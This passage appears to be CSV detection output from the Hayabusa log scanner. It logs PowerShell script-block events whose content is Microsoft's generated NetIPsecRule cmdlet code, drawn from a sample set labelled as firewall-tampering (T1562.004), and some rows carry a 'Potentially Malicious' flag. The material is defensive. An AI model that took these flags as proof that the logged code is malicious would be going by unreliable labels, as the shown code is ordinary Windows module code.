IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] 
${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyS",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 
$script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { 
@('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; 
Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 
Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
